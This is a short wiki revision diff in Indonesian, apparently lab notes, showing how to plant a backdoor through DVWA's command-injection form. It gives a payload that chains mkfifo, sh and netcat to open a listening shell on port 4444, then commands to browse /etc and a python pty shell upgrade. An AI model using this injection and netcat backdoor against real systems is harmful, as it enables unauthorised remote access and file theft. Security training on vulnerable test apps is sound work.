Difference between revisions of "DVWA: Command Injection Back Door"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) (Created page with " 192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe Untuk dapet shell ketik python -c 'import pty; pty.spawn("/bin/sh")'") |
Onnowpurbo (talk | contribs) |
||
| Line 1: | Line 1: | ||
| + | Backdoor menggunakan perintah | ||
| + | fifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe | ||
| + | |||
| + | Dari command injection di DVWA masukan | ||
192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe | 192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe | ||
| + | dimana 192.168.43.1 adalah salah satu IP mesin di jaringan | ||
| + | |||
| + | Selanjutnya kita bisa memasukan perintah2 shell seperti | ||
| + | |||
| + | ls | ||
| + | cd /etc | ||
| + | cat <namafile> | ||
| + | dsb | ||
| − | + | Percobaan untuk memperoleh shell | |
python -c 'import pty; pty.spawn("/bin/sh")' | python -c 'import pty; pty.spawn("/bin/sh")' | ||
Revision as of 05:10, 23 October 2018
Backdoor menggunakan perintah
fifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Dari command injection di DVWA masukan
192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
dimana 192.168.43.1 adalah salah satu IP mesin di jaringan
Selanjutnya kita bisa memasukan perintah2 shell seperti
ls cd /etc cat <namafile> dsb
Percobaan untuk memperoleh shell
python -c 'import pty; pty.spawn("/bin/sh")'